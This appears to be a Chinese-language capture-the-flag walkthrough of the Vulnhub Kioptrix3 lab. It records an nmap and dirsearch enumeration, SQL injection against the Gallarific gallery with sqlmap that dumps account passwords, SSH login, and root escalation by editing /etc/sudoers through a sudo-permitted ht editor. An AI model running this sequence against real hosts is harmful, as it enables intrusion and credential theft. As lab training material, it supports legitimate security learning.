Vulnhub 报告
信息获取
系统 IP:192.168.8.100
服务枚举
| Server IP Address | Ports Open |
|---|---|
| 192.168.8.100 | TCP 22,80 |
使用 Nmap 扫描:
$ nmap -p- -sV -sC 192.168.8.100 --min-rate 1000
结果:
bash
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 04:35 EDT
Nmap scan report for 192.168.8.100 (192.168.8.100)
Host is up (0.0030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds目录枚举
$ dirsearch -u "http://192.168.8.100/"
结果:
bash
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/maptnh/reports/http_192.168.8.100/__24-05-18_04-38-27.txt
Target: http://192.168.8.100/
[04:38:27] Starting:
[04:38:29] 403 - 331B - /.ht_wsr.txt
[04:38:29] 403 - 334B - /.htaccess.bak1
[04:38:29] 403 - 334B - /.htaccess.orig
[04:38:29] 403 - 336B - /.htaccess.sample
[04:38:29] 403 - 334B - /.htaccess.save
[04:38:29] 403 - 332B - /.htaccess_sc
[04:38:29] 403 - 334B - /.htaccess_orig
[04:38:29] 403 - 332B - /.htaccessOLD
[04:38:29] 403 - 333B - /.htaccessOLD2
[04:38:29] 403 - 335B - /.htaccess_extra
[04:38:29] 403 - 332B - /.htaccessBAK
[04:38:29] 403 - 325B - /.html
[04:38:29] 403 - 324B - /.htm
[04:38:29] 403 - 334B - /.htpasswd_test
[04:38:29] 403 - 331B - /.httr-oauth
[04:38:29] 403 - 330B - /.htpasswds
[04:38:49] 301 - 353B - /cache -> http://192.168.8.100/cache/
[04:38:52] 301 - 352B - /core -> http://192.168.8.100/core/
[04:38:52] 200 - 688B - /core/fragments/moduleInfo.phtml
[04:38:53] 403 - 324B - /data
[04:38:53] 403 - 336B - /data/adminer.php
[04:38:53] 403 - 336B - /data/autosuggest
[04:38:53] 403 - 333B - /data/backups/
[04:38:53] 403 - 349B - /data/DoctrineORMModule/Proxy/
[04:38:53] 403 - 349B - /data/DoctrineORMModule/cache/
[04:38:53] 403 - 334B - /data/sessions/
[04:38:53] 403 - 331B - /data/files/
[04:38:53] 403 - 325B - /data/
[04:38:53] 403 - 331B - /data/cache/
[04:38:53] 403 - 331B - /data/debug/
[04:38:53] 403 - 330B - /data/logs/
[04:38:53] 403 - 329B - /data/tmp/
[04:38:57] 200 - 23KB - /favicon.ico
[04:38:58] 301 - 355B - /gallery -> http://192.168.8.100/gallery/
[04:39:10] 301 - 355B - /modules -> http://192.168.8.100/modules/
[04:39:10] 200 - 2KB - /modules/
[04:39:15] 301 - 358B - /phpmyadmin -> http://192.168.8.100/phpmyadmin/
[04:39:16] 401 - 519B - /phpmyadmin/scripts/setup.php
[04:39:16] 200 - 8KB - /phpmyadmin/
[04:39:16] 200 - 8KB - /phpmyadmin/index.php
[04:39:21] 403 - 334B - /server-status/
[04:39:21] 403 - 333B - /server-status
[04:39:25] 301 - 353B - /style -> http://192.168.8.100/style/
[04:39:30] 200 - 18B - /update.php
Task CompletedSQL 注入
访问目标:http://192.168.8.100/gallery/
使用 searchsploit 搜索 Gallarific存在的历史CVE
$ searchsploit Gallarific
结果:
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gallarific - 'search.php?query' Cross-Site Scripting | php/webapps/31369.txt
Gallarific - 'user.php' Arbirary Change Admin Information | php/webapps/8796.html
Gallarific - Multiple Script Direct Request Authentication Bypass | php/webapps/31370.txt
Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category | php/webapps/9421.txt
GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection | php/webapps/15891.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
使用: php/webapps/15891.txt
$ cat /usr/share/exploitdb/exploits/php/webapps/15891.txt
获取数据库
$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch
$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch
$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+
SSH
$ ssh dreg@192.168.8.100
3.2.1.5 Local 内容
loneferret@Kioptrix3:~$ cat /home/loneferret/Local.txt
u28dt2i0
权限提升
loneferret@Kioptrix3:~$ sudo -l
结果:
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Found that the file /usr/local/bin/ht has the SUID bit set.
loneferret@Kioptrix3:~$ ls -la /usr/local/bin/ht
尝试运行:
loneferret@Kioptrix3:~$ /usr/local/bin/ht
结果:
Error opening terminal: xterm-256color.
使用命令 export TERM=xterm 以确保终端仿真器能够正确地处理和显示终端应用程序的输出。
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
我们现在使用的是root权限运行ht编辑器来编辑文档。
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht /etc/sudoers
F3 and /etc/sudoers and ENter
F2 保存文件
loneferret@Kioptrix3:~$ sudo /bin/bash
Proot 内容
root@Kioptrix3:~# cat /root/Proot.txt
d2ua8u2yd